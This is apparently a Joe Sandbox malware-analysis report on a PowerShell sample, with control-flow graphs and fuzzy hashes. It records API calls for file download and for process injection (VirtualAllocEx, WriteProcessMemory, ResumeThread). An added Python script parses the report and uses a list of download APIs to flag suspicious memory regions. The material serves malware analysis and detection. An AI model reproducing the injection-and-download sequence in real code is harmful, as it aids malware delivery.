100->107 118 70749fe-7074a2c 101->118 116 7074997-7074999 106->116 117 70749a3-70749a6 106->117 108 7074957 107->108 109 7074959-7074965 107->109 108->106 109->106 116->117 117->118 123 7074a2f call 46b7a08 118->123 124 7074a2f call 46b7a18 118->124 125 7074a2f call 46b1bf8 118->125 126 7074a2f call 46b7c45 118->126 121 7074a34-7074a90 123->121 124->121 125->121 126->121
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 8d603974bb9ccd3d8a599edb81105b57461f6595b84d05e5b441db5806a7a98a
                                                                                                                  • Instruction ID: adaab9c00321c0cb740475a52c7a86d521af9eac4b2f31d253714e5819e55d95
                                                                                                                  • Opcode Fuzzy Hash: 8d603974bb9ccd3d8a599edb81105b57461f6595b84d05e5b441db5806a7a98a
                                                                                                                  • Instruction Fuzzy Hash: EFE1E0B1F00245ABCB159F68C400B6EBBE6ABC9710F24C669F9059F390DE32EC45CB95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 127 70704f8-707050a 128 7070510-7070521 127->128 129 70705ca-70705e8 127->129 132 7070523-7070529 128->132 133 707053b-7070558 128->133 134 7070612-707063e 129->134 135 70705ea-70705fd 129->135 136 707052d-7070539 132->136 137 707052b 132->137 133->129 145 707055a-707057c 133->145 151 7070640-707064e 134->151 152 70706bb-70706c0 134->152 138 70705ff-707060b 135->138 139 707066b-7070675 135->139 136->133 137->133 138->134 142 7070677-707067d 139->142 143 7070680-7070686 139->143 146 707068c-7070698 143->146 147 7070688-707068a 143->147 155 7070596-70705ae 145->155 156 707057e-7070584 145->156 149 707069a-70706b8 146->149 147->149 166 7070656-7070665 151->166 152->151 163 70705b0-70705b2 155->163 164 70705bc-70705c7 155->164 159 7070586 156->159 160 7070588-7070594 156->160 159->155 160->155 163->164 166->139
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 95417034dc749fe31e8ab16933ae556ad7070a1248fd6591226e9411fafc030e
                                                                                                                  • Instruction ID: 812043e7a534adb2fe80ebf4fd3c88c648364dcac052f5174bf079d6677a214a
                                                                                                                  • Opcode Fuzzy Hash: 95417034dc749fe31e8ab16933ae556ad7070a1248fd6591226e9411fafc030e
                                                                                                                  • Instruction Fuzzy Hash: 175146B1F00314ABC7209B68C811B2BBFE6AFC5710F54C65AE949DF281CA31EC45C7A5

Control-flow Graph (entry 46b1bf8; block 46b7e71-46b7ea6 calls URLDownloadToFileW; edge list and executed/not-executed colouring not reproduced)

                                                                                                                  APIs
                                                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B7E99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DownloadFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1407266417-0
                                                                                                                  • Opcode ID: 632b5d78d12003854a772fac3b8dab27112433d2666b77c673a4c866fb9278a0
                                                                                                                  • Instruction ID: 052781411d0639fb006edb7973cdd68415d6b1a8e44841b67af09ffbbefabd83
                                                                                                                  • Opcode Fuzzy Hash: 632b5d78d12003854a772fac3b8dab27112433d2666b77c673a4c866fb9278a0
                                                                                                                  • Instruction Fuzzy Hash: 3921F3B1D01219AFCB00CF99D884ADEFBF4FF88310F10812AE918A7250D375AA55CBA0
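The block above is the one security-relevant record in this part of the report: URLDownloadToFileW.URLMON is reached at 046B7E99 from a memory region (offset 046B0000, "based on PE: false") inside the powershell process, so the downloader lives in code that was never mapped from an image on disk. Every recovered function carries the same "Memory Dump Source" rows, which makes the format easy to mine. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses these rows, decodes the .sdmp file name, and lists download APIs called from executable, non-image memory in powershell, which is the triage question this section answers. Assumptions: the .sdmp name layout (pid.run.timestamp.base.protection.type.state.extra) and the reading of its fifth field as a Win32 page-protection value (0x40 = PAGE_EXECUTE_READWRITE) are inferred from the names shown here and not documented on this page; the NETWORK_APIS list is my own; the sample input is two blocks copied from the report above, abridged and with the extraction indentation removed.

```python
"""Added example: parse Joe Sandbox "Memory Dump Source" blocks and flag
download APIs reached from executable memory inside powershell.
Assumed (not stated on the report page): .sdmp names are laid out as
pid.run.timestamp.base.protection.type.state.extra and the protection field
is a Win32 constant (0x40 == PAGE_EXECUTE_READWRITE)."""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant

# Constructed input: two blocks copied (abridged) from the report text above.
SAMPLE_REPORT = """\
Control-flow Graph
• Executed
• Not Executed
APIs
• URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B7E99
Memory Dump Source
• Source File: 00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode Fuzzy Hash: 632b5d78d12003854a772fac3b8dab27112433d2666b77c673a4c866fb9278a0
• Instruction Fuzzy Hash: 3921F3B1D01219AFCB00CF99D884ADEFBF4FF88310F10812AE918A7250D375AA55CBA0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
Similarity
• API ID:
• String ID: tP^q
• API String ID: 0-2862610199
• Opcode Fuzzy Hash: e7dcefbc43f17a1df0f952260c29bd0de302aacef134a4b1f933c8f75f31e79c
• Instruction Fuzzy Hash: 9991DFB0E00245ABCB14CF58C441B69BBF2BB89710F65C659F815AF390DB32EC45CB95
"""

API_RE = re.compile(r"^•\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
SNAP_RE = re.compile(r"^•\s*Snapshot File:\s*hcaresult_(?P<pid>\d+)_(?P<run>\d+)_[0-9a-f]+_(?P<proc>\w+)\.jbxd$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")


@dataclass
class CodeBlock:
    dump: str = ""
    offset: str = ""            # load address of the dumped region
    from_pe: bool = False       # "based on PE: false" => not a mapped image
    protection: int = 0         # assumed: fifth field of the dump name
    pid: int = 0
    process: str = ""
    apis: list = field(default_factory=list)    # (func, module, args, ref)
    fields: dict = field(default_factory=dict)  # remaining "key: value" rows

    @property
    def is_rwx(self) -> bool:
        return self.protection == PAGE_EXECUTE_READWRITE


def parse_blocks(text: str) -> list:
    """Split report text into CodeBlock records. API rows precede the
    "Memory Dump Source" rows of their block, so a block is closed on its
    last row (Instruction Fuzzy Hash) rather than opened on a header."""
    blocks, cur = [], CodeBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := API_RE.match(line):
            cur.apis.append((m["func"], m["module"], m["args"], m["ref"]))
        elif m := SRC_RE.match(line):
            cur.dump, cur.offset = m["dump"], m["offset"]
            cur.from_pe = m["pe"] == "true"
            parts = cur.dump[: -len(".sdmp")].split(".")
            cur.pid = int(parts[0], 16)          # assumed field order
            cur.protection = int(parts[4], 16)   # assumed field order
        elif m := SNAP_RE.match(line):
            cur.process = m["proc"]
        elif m := KV_RE.match(line):
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = CodeBlock()
    return blocks


# Download/HTTP primitives worth flagging in a script host (my own list).
NETWORK_APIS = {"URLDownloadToFileW", "URLDownloadToFileA", "InternetOpenUrlW",
                "InternetOpenUrlA", "HttpSendRequestW", "HttpSendRequestA",
                "WinHttpSendRequest"}


def find_network_apis(blocks, process="powershell"):
    """Download-API calls made from `process`, with the region they sit in."""
    hits = []
    for b in blocks:
        if b.process != process:
            continue
        for func, module, args, ref in b.apis:
            if func in NETWORK_APIS:
                hits.append({"process": b.process, "pid": b.pid,
                             "region": b.offset, "rwx": b.is_rwx,
                             "from_pe": b.from_pe, "api": f"{module}!{func}",
                             "args": args, "ref": ref,
                             "opcode_hash": b.fields.get("Opcode Fuzzy Hash", "")})
    return hits


def non_pe_exec_regions(blocks):
    """Executable regions not backed by a PE image: candidate in-memory
    assemblies or shellcode that merit a dump and a YARA pass."""
    return sorted({b.offset for b in blocks if b.is_rwx and not b.from_pe})


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE_REPORT)
    for hit in find_network_apis(parsed):
        print(hit)
    print("non-PE executable regions:", non_pe_exec_regions(parsed))
```

Run it over the full report text instead of SAMPLE_REPORT to get every download call per process; the Opcode Fuzzy Hash carried in each hit is the value to pivot on when searching other reports for the same downloader stub.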

Control-flow Graph (entry 70745f4, basic blocks 70745f4-7074bce; block 7074a2f calls into 46b7a08, 46b7a18, 46b1bf8 and 46b7c45 in the 046B0000 region; edge list and executed/not-executed colouring not reproduced)

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q
                                                                                                                  • API String ID: 0-2862610199
                                                                                                                  • Opcode ID: e7dcefbc43f17a1df0f952260c29bd0de302aacef134a4b1f933c8f75f31e79c
                                                                                                                  • Instruction ID: 6a32d8515746b3558d6c8aaceb1e8507e0dabf349d45cf719d0e622637b0af54
                                                                                                                  • Opcode Fuzzy Hash: e7dcefbc43f17a1df0f952260c29bd0de302aacef134a4b1f933c8f75f31e79c
                                                                                                                  • Instruction Fuzzy Hash: 9991DFB0E00245ABCB14CF58C441B69BBF2BB89710F65C659F815AF390DB32EC45CB95

Control-flow Graph (entry 7071f40, basic blocks 7071f40-7072175; edge list and executed/not-executed colouring not reproduced)

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9bfe53368b673219d03731d2574ed0609153bc1c4503f1bbb0b43d234859df7a
                                                                                                                  • Instruction ID: c2c07e329fa4e365431c68fe7faeb0aacc46a38d1ded2cd0432904cfe1f7c4b2
                                                                                                                  • Opcode Fuzzy Hash: 9bfe53368b673219d03731d2574ed0609153bc1c4503f1bbb0b43d234859df7a
                                                                                                                  • Instruction Fuzzy Hash: AB51D4B0B043168FCB218B688C1166EBBF2BFD5311B5581AAD604DF392DB31D981C7A5

Control-flow Graph (entry 7071f24, basic blocks 7071f24-7072175; edge list and executed/not-executed colouring not reproduced)

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ca78cee2f592fc97c1813e7059da9e151b349deb60f1b8a9d3c8af49aa5f0c76
                                                                                                                  • Instruction ID: 11671b58e6c3ef28f54c7ce46935f976e566c60598d995bcd2d2aadf813c2581
                                                                                                                  • Opcode Fuzzy Hash: ca78cee2f592fc97c1813e7059da9e151b349deb60f1b8a9d3c8af49aa5f0c76
                                                                                                                  • Instruction Fuzzy Hash: 6D41C5F0E043069FCB708B258C01A6E7BB2BB95311F598295DA14DF396D731D981CBA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1792927687.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_bcd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f08a056bee85fb94ee5314229f5fc7e59c10e128539a859a998b9308875e8448
                                                                                                                  • Instruction ID: 382b2ea604b0d135ec7062c9d190891723ffa8c628f9a7755b14b0a267b29fd2
                                                                                                                  • Opcode Fuzzy Hash: f08a056bee85fb94ee5314229f5fc7e59c10e128539a859a998b9308875e8448
                                                                                                                  • Instruction Fuzzy Hash: 6801F2751083409AE7208A2DCCC4F67BFD8DF51325F18C4AEEC080B282C6799842C6B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1792927687.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_bcd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f2f97b272cc82d5e217d3e97d94c4d6f373fb4709431b63b5bc05f674081bb8e
                                                                                                                  • Instruction ID: 2ddd22194403a2c9d7cdbe7b18a68345853bda1ee9b47ecb33c08ec0ad6c6fb7
                                                                                                                  • Opcode Fuzzy Hash: f2f97b272cc82d5e217d3e97d94c4d6f373fb4709431b63b5bc05f674081bb8e
                                                                                                                  • Instruction Fuzzy Hash: E5015E7250E3C09ED7128B258CA4B62BFA4DF52225F1980DBEC888F193C2695848C772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-1608119003
                                                                                                                  • Opcode ID: 40b3097bd83ef5fd409508d1a2de131f82b9f723f3dda936ada62b4f546cd408
                                                                                                                  • Instruction ID: 70669c257b87b1cabfb306c967e1e63c68b14b207fff1ac468207367cb0d4c84
                                                                                                                  • Opcode Fuzzy Hash: 40b3097bd83ef5fd409508d1a2de131f82b9f723f3dda936ada62b4f546cd408
                                                                                                                  • Instruction Fuzzy Hash: 3CF138B1F0031A9FCB648B6898017AABBF6AFC5321F14866AD455CF281DF31DD46C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-578306960
                                                                                                                  • Opcode ID: 1f3d08ffc8ca4a62ba8aa02f21a77656d3b5106464be9fdbab5ce330ddbb7d22
                                                                                                                  • Instruction ID: e9317502b4b7219075dc170911e521932b448117a3b54ff3460c2bad6e044cf4
                                                                                                                  • Opcode Fuzzy Hash: 1f3d08ffc8ca4a62ba8aa02f21a77656d3b5106464be9fdbab5ce330ddbb7d22
                                                                                                                  • Instruction Fuzzy Hash: 95315772B142158FD7188B298800B6ABBE5BFC5720F24866EE949CF351CA31DC44C7A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1420252700
                                                                                                                  • Opcode ID: 4d31383cb7b9379008c7cfe7d467707a3ef7bae27030d10a306576a3491da7a5
                                                                                                                  • Instruction ID: b776f57c6ac473d3fea4e955b6773c203944bb04f78993f916c7a9fc78e6983d
                                                                                                                  • Opcode Fuzzy Hash: 4d31383cb7b9379008c7cfe7d467707a3ef7bae27030d10a306576a3491da7a5
                                                                                                                  • Instruction Fuzzy Hash: C9D134B1F043059FCB258A68881176ABBF6BFD6321F14C56AD905CF281DF31D982C7A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1420252700
                                                                                                                  • Opcode ID: d648ad049d9f79d25c30832946a5010847a4f36df480ba65de6e89a2ede76c42
                                                                                                                  • Instruction ID: 374fe6fb98fc6ab0202b34c81a28e41960d18b9cd5965a8d33a00a9a617ab2df
                                                                                                                  • Opcode Fuzzy Hash: d648ad049d9f79d25c30832946a5010847a4f36df480ba65de6e89a2ede76c42
                                                                                                                  • Instruction Fuzzy Hash: CE8145B1F04386CFDB548B68D8446AAFBF2BF85351F1481ABD449CB291DB31C845CBA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-2125118731
                                                                                                                  • Opcode ID: ee165943de57327d4a9203f842c61de50e5093c865638a165e220d2bb9f21719
                                                                                                                  • Instruction ID: a5b90516fa5f70791a675277ae39730439414aca9e9341b88e04671c604dfcc8
                                                                                                                  • Opcode Fuzzy Hash: ee165943de57327d4a9203f842c61de50e5093c865638a165e220d2bb9f21719
                                                                                                                  • Instruction Fuzzy Hash: 34218BF1B003966BEB38856A8801B3BEED69BC4B15FA0C52A9509CF3C1CD32C841D365
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: b44745ea256f6f9cdc9c1d74c0e29731f3f14f2e330db66682a103236df8c6a6
                                                                                                                  • Instruction ID: cccb10b3a9f1cbfed3d1fe21f7bca41c71a3c0a82e1be1a22433109ba45505da
                                                                                                                  • Opcode Fuzzy Hash: b44745ea256f6f9cdc9c1d74c0e29731f3f14f2e330db66682a103236df8c6a6
                                                                                                                  • Instruction Fuzzy Hash: 2501D4A1B0E3C50FC72B12385C206592FB25B83561B2A47DFC180DF297CE194C46C3A6

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:61
                                                                                                                  Total number of Limit Nodes:18
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d219681da906813bdf9fcd9843de63ba47291d4f44632e6e388a807193f3345
                                                                                                                  • Instruction ID: 9484bff01937e5d688a8cad2665f5eefb27054bfe7e1e44df2f44ad1015f7944
                                                                                                                  • Opcode Fuzzy Hash: 2d219681da906813bdf9fcd9843de63ba47291d4f44632e6e388a807193f3345
                                                                                                                  • Instruction Fuzzy Hash: C2721938A002198FDB55EF78D8587AD7BB2BB89311F108569EA0AD7390DF744D82CF51

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3310885943
                                                                                                                  • Opcode ID: 33df5081eaa3c90deb7960d48c876ad0d9e30b56b92a2d4ff7086396c64ad131
                                                                                                                  • Instruction ID: 0535c0c4b50efaabd153491e8cd1fe06967cc3dace9172d0b230c2ad63e17841
                                                                                                                  • Opcode Fuzzy Hash: 33df5081eaa3c90deb7960d48c876ad0d9e30b56b92a2d4ff7086396c64ad131
                                                                                                                  • Instruction Fuzzy Hash: 46C127B5B1430A9FDB298A39881076ABBE6AFC9715F24846AD405CF2C1DF31DD41CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3512890053
                                                                                                                  • Opcode ID: ff26dd6a215857ae0cc9d57b831269a58e56399d8da8f6fe9e6d801fa97e51a6
                                                                                                                  • Instruction ID: e117d2ed5e702500893336e6f41b8b5e3ceb15458e899192aaa2e932d39894e6
                                                                                                                  • Opcode Fuzzy Hash: ff26dd6a215857ae0cc9d57b831269a58e56399d8da8f6fe9e6d801fa97e51a6
                                                                                                                  • Instruction Fuzzy Hash: AAB12BB1B0030EEFCB2A4E69840467A7BE2AF86711F1A846AD805CB2D1DF35CC45DF61

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3199432138
                                                                                                                  • Opcode ID: 47413442a3d3888f527e0825cf5b0dd97809beaeb2cbcb17b984e6fc14e99793
                                                                                                                  • Instruction ID: 5aa0ac6b4b6bde655fc6886af20adf45e96e69dc5a1a940a33246b8472832c6f
                                                                                                                  • Opcode Fuzzy Hash: 47413442a3d3888f527e0825cf5b0dd97809beaeb2cbcb17b984e6fc14e99793
                                                                                                                  • Instruction Fuzzy Hash: 7381F6B1B0120ADFCF299E69C5446AABBE1BF8D311F14847AD449CB281EB71DC45CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1988592219
                                                                                                                  • Opcode ID: aa2bec7464dceace6c444d7188496d8bd373321b2f004ad616ab3e7ebdfbd85d
                                                                                                                  • Instruction ID: cd8ee7b28ae920f2770a329e5e0c2115ea86f7a1987597a2f9d434cbc8e75622
                                                                                                                  • Opcode Fuzzy Hash: aa2bec7464dceace6c444d7188496d8bd373321b2f004ad616ab3e7ebdfbd85d
                                                                                                                  • Instruction Fuzzy Hash: C0F1E7B1B04306DFDB1A9F68C8047AABBE2BF85311F14C46AE5698B291DB31DC45CF91
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 00CAC22C
                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 00CAC320
                                                                                                                    • Part of subcall function 00CA75E8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00CAC6CA
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4270437565-0
                                                                                                                  • Opcode ID: ca4c48df7a9bdc6c7ef04f9ec9fc2f0b26cbe6c4537db23dcfc57f869ee6cfcc
                                                                                                                  • Instruction ID: fb7573c613c794b9fa7141e4e5ff82a630fec789440e5edd178ecb86b04979da
                                                                                                                  • Opcode Fuzzy Hash: ca4c48df7a9bdc6c7ef04f9ec9fc2f0b26cbe6c4537db23dcfc57f869ee6cfcc
                                                                                                                  • Instruction Fuzzy Hash: 29824E70E0021ACFDB64DF69C994BAAB7F1BF45318F1084A9D45AAB251DB34EE84CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de5be765c15e95c2f52a275b6d36d3457648ede1d0be1a3fd32cbe4eb1ecfc7d
                                                                                                                  • Instruction ID: 8b09502eb83d18c171a71a033a82a2c2d87c33dc2452a0b3f694737c71ca0e7f
                                                                                                                  • Opcode Fuzzy Hash: de5be765c15e95c2f52a275b6d36d3457648ede1d0be1a3fd32cbe4eb1ecfc7d
                                                                                                                  • Instruction Fuzzy Hash: C4525174A0121ACFDB24DF28C985BAAB7F1BF46318F14C5A9D46A97251DB34EE80CF50

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; the raw node-edge dump for basic blocks 71d09a9-71d0e5f carries no API annotations and is not reproduced)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
